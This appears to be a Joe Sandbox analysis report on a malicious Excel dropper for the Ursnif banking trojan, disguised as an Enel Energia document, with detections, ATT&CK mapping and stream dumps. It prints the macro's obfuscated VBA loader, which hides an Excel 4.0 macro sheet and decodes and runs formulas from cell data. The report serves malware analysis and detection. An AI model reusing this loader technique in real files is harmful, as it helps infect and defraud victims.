Windows Analysis Report 004192374854_4.xls

Overview

General Information

Sample Name:004192374854_4.xls
Analysis ID:504678
MD5:f480fc1afe995ae4cafcb89b83295d88
SHA1:441f53d97186305891267b6b98382f2a0fa180b7
SHA256:d29f6c42fa70b462166272142d33012c41c471ea2c02943fae147fbccd5420aa

Detection

Ursnif Dropper
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected Italy targeted Ursnif dropper document
Document contains an embedded VBA macro with suspicious strings
Document contains embedded VBA macros

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2576 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: 004192374854_4.xls | Virustotal: Detection: 8%
Source: 004192374854_4.xls | ReversingLabs: Detection: 11%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

E-Banking Fraud:

Detected Italy targeted Ursnif dropper document
Source: Initial sample | OLE, VBA macro line: Ursnif specific tokens

System Summary:

Document contains an embedded VBA macro with suspicious strings
Source: 004192374854_4.xls | OLE, VBA macro line: Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = sc_team: S_mes
Source: 004192374854_4.xls | OLE, VBA macro line: ActiveSheet.Visible = 0
Source: 004192374854_4.xls | OLE indicator, VBA macros: true
Source: 004192374854_4.xls | Virustotal: Detection: 8%
Source: 004192374854_4.xls | ReversingLabs: Detection: 11%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRED79.tmp
Source: 004192374854_4.xls | OLE indicator, Workbook stream: true
Source: classification engine | Classification label: mal60.bank.expl.winXLS@1/0@0/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: 004192374854_4.xls | Initial sample: OLE summary comments = Enel Energia - Mercato libero dell'energia
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (this event is listed 12 times in the report)

Mitre Att&ck Matrix

Two technique rows per tactic, as laid out in the report; trailing digits are kept as they appear in the report.

Initial Access: Valid Accounts | Default Accounts
Execution: Scripting 11 | Scheduled Task/Job
Persistence: Path Interception | Boot or Logon Initialization Scripts
Privilege Escalation: Path Interception | Boot or Logon Initialization Scripts
Defense Evasion: Scripting 11 | Rootkit
Credential Access: OS Credential Dumping | LSASS Memory
Discovery: File and Directory Discovery 1 | System Information Discovery 1
Lateral Movement: Remote Services | Remote Desktop Protocol
Collection: Data from Local System | Data from Removable Media
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth
Command and Control: Data Obfuscation | Junk Data
Network Effects: Eavesdrop on Insecure Network Communication | Exploit SS7 to Redirect Phone Calls/SMS
Remote Service Effects: Remotely Track Device Without Authorization | Remotely Wipe Data Without Authorization
Impact: Modify System Partition | Device Lockout

Behavior Graph

Graph image and its legend are not reproduced in this text export.

Screenshots

Screenshot thumbnails are not reproduced in this text export.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
004192374854_4.xls | 9% | Virustotal |
004192374854_4.xls | 3% | Metadefender |
004192374854_4.xls | 11% | ReversingLabs | Script.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:504678
Start date:18.10.2021
Start time:14:29:13
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 21s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:004192374854_4.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:3
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal60.bank.expl.winXLS@1/0@0/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xls
  • Changed system and user locale, location and keyboard layout to Italian - Italy
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active Picture Object
  • Active AutoShape Object
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Create Time/Date: Mon Oct 18 10:07:46 2021, Last Saved Time/Date: Mon Oct 18 10:09:47 2021, Security: 0, Comments: Enel Energia - Mercato libero dell'energia
Entropy (8bit):6.0128480654935625
TrID:
  • Microsoft Excel sheet (30009/1) 78.94%
  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:004192374854_4.xls
File size:59904
MD5:f480fc1afe995ae4cafcb89b83295d88
SHA1:441f53d97186305891267b6b98382f2a0fa180b7
SHA256:d29f6c42fa70b462166272142d33012c41c471ea2c02943fae147fbccd5420aa
SHA512:b5ea9a01308a6b84d89ba573a0a1957c448ea9e126323e748dfdae1caafbeed67d88188e3256799c40b5c0665370ff65985a41c38a0cdd2ff6fc6d30000c85f5
SSDEEP:1536:SsQlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0zCoyp6p2UUaVgO8f4QmMC:ShlYkEIuPm3fNRZmbaoFhZhR0cixIHm6
File Content Preview:........................>...................................M..................................................................................................................................................................................................

File Icon

Icon Hash:e4eea286a4b4bcb4

Static OLE Info

General

Document Type:OLE
Number of OLE Files:1

OLE File "004192374854_4.xls"

Indicators

Has Summary Info:True
Application Name:unknown
Encrypted Document:False
Contains Word Document Stream:False
Contains Workbook/Book Stream:True
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Code Page:1252
Comments:Enel Energia - Mercato libero dell'energia
Create Time:2021-10-18 09:07:46.324000
Last Saved Time:2021-10-18 09:09:47
Security:0

Document Summary

Document Code Page:1252
Thumbnail Scaling Desired:False
Company:
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:1048576

Streams with VBA

VBA File Name: Foglio1, Stream Size: 992
General
Stream Path:_VBA_PROJECT_CUR/VBA/Foglio1
VBA File Name:Foglio1
Stream Size:992
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . l . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 6c ae c2 d1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: Questa_cartella_di_lavoro, Stream Size: 5995
General
Stream Path:_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro
VBA File Name:Questa_cartella_di_lavoro
Stream Size:5995
Data ASCII:. . . . . . . . . 2 . . . . . . . . . . . ` . . . n . . . 6 . . . . . . . . . . . l . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . g . . . . O . . 3 . ^ . x . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . b > , . B B . . 4 S . p . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . b > , . B B . . 4 S . p . = . . g . . . . O . . 3 . ^ . x . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 03 00 01 00 00 32 0b 00 00 e4 00 00 00 10 02 00 00 60 0b 00 00 6e 0b 00 00 36 13 00 00 00 00 00 00 01 00 00 00 6c ae e2 1e 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 8c a9 67 e2 86 d1 02 4f 90 a1 33 8e 5e c5 78 09 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function q_sin(a As String)
q_sin = Len(a)
End Function

Function Onto()
Onto = "T" & R_Rt & "O" & "()"
End Function

Function ritor_n(dd As String, i As Integer)
i = r: Sheets(1).[D4].FormulaLocal = dd
End Function

Function r_itorn()
r_itorn = m_tf & "R" & "I"
End Function
Function b_ella()
rom = 7: Sheets(4 - 3).Cells(27, 4).FormulaLocal = r_itorn & Onto
End Function

Sub I_ingrandisci_immage()
ec_e = 3
Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = sc_team: S_mes
v_ve = mi_i
For Each Ax In rem_m
ec_e = 1: ec_e = 5: vG = (ritor_n(m_tf & Ax, 1 + ec_e)): ec_e = 112: Lii ((ec_e))
Next
End Sub

Function mi_i()
mi_i = b_ella
End Function

Sub S_mes()
ActiveSheet.Visible = 0
End Sub
Function R_Rt() As String
R_Rt = sc_team & "RN"
End Function
Sub Lii(w As Long)
numm = w: Run ("" & "D" & 3)
End Sub
Function rem_m() As Variant
For Each Xd In amsoO(Cells(155, 2), 3)
If Not (IsNumeric(Xd)) Then gj = LTrim(Left(Xd, q_sin("" & Xd) - 1)) Else gj = LTrim(Xd)
eh = eh & Chr(gj)
Next
rem_m = Split(eh, "" & "k")
End Function

Function sc_team() As String
sc_team = "O"
End Function
Function m_tf()
m_tf = sc_team: m_tf = "="
End Function

Public Function amsoO(a As String, z As Long) As Variant
Dim q As Long, pk As Long
Dim il() As String
ReDim il(0 To CLng((q_sin(a) / z) - 1))
For q = 1 To q_sin(a) Step z
il(pk) = Mid(a, q, z): pk = pk + 1
Next
amsoO = il
End Function

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 118
General
Stream Path:\x1CompObj
File Type:data
Stream Size:118
Entropy:4.32915524493
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F * . . . ( F o g l i o d i l a v o r o d i M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 2a 00 00 00 28 46 6f 67 6c 69 6f 20 64 69 20 6c 61 76 6f 72 6f 20 64 69 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 248
General
Stream Path:\x5DocumentSummaryInformation
File Type:data
Stream Size:248
Entropy:2.76031921322
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F o g l i o 1 . . . . . . . . . . . . . . . . . F o g l i d i l a v o r o . . . . . . . . .
Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a0 00 00 00
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 196
General
Stream Path:\x5SummaryInformation
File Type:data
Stream Size:196
Entropy:3.83679035111
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . X . . . . . . . ` . . . . . . . . . . . . . . . . . . . @ . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . + . . . E n e l E n e r g i a - M e r c a t o l i b e r o d e l l ' e n e r g i a . .
Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 94 00 00 00 05 00 00 00 01 00 00 00 38 00 00 00 0c 00 00 00 40 00 00 00 0d 00 00 00 4c 00 00 00 13 00 00 00 58 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e4 04 00 00 40 00 00 00 40 0d dc 9d ff c3 d7 01 40 00 00 00
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 37624
General
Stream Path:Workbook
File Type:Applesoft BASIC program data, first line number 16
Stream Size:37624
Entropy:6.95337905268
Base64 Encoded:True
Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . C
Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 460
General
Stream Path:_VBA_PROJECT_CUR/PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:460
Entropy:5.40240561228
Base64 Encoded:True
Data ASCII:I D = " { 9 C 2 4 6 F 7 F - D 3 1 A - 4 C E 0 - 8 F B 5 - B 2 1 3 9 9 7 F D 9 5 D } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 F 2 D 3 F 1 2 4 1 6 E 7 4 7 2 7 4 7 2 7 4 7 2 7 4 7 2 " . . D P B = " 5 E 5 C 4 E 4 3 5 2 5 D 8 0 5 E 8 0 5 E 8 0 "
Data Raw:49 44 3d 22 7b 39 43 32 34 36 46 37 46 2d 44 33 31 41 2d 34 43 45 30 2d 38 46 42 35 2d 42 32 31 33 39 39 37 46 44 39 35 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56
Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
General
Stream Path:_VBA_PROJECT_CUR/PROJECTwm
File Type:data
Stream Size:104
Entropy:3.33133492199
Base64 Encoded:False
Data ASCII:Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . . .
Data Raw:51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2967
General
Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:data
Stream Size:2967
Entropy:4.42847128636
Base64 Encoded:False
Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:cc 61 b5 00 00 03 00 ff 10 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2021
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:data
Stream Size:2021
Entropy:3.33587292125
Base64 Encoded:False
Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . D . . n . . K . Z . . e P . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 268
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:data
Stream Size:268
Entropy:1.7944240825
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . d d . . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . z N . . .
Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 1677
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:data
Stream Size:1677
Entropy:2.23308967474
Base64 Encoded:False
Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:72 55 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 03 00 00 00 00 00 00 00 00 00 00 11 08 00 00 00 00 00 00 00 00 00 00 41 08
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 1000
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:data
Stream Size:1000
Entropy:2.49581230808
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . O . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . X . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . .
Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 50 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 08 01 d9 08 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 563
General
Stream Path:_VBA_PROJECT_CUR/VBA/dir
File Type:data
Stream Size:563
Entropy:6.2569676839
Base64 Encoded:True
Data ASCII:. / . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . s . d c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
Data Raw:01 2f b2 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e4 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 b1 73 a0 64 63 17 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

Network Behavior

No network behavior found

System Behavior

General

Start time:14:29:21
Start date:18/10/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13f2d0000
File size:28253536 bytes
MD5 hash:D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high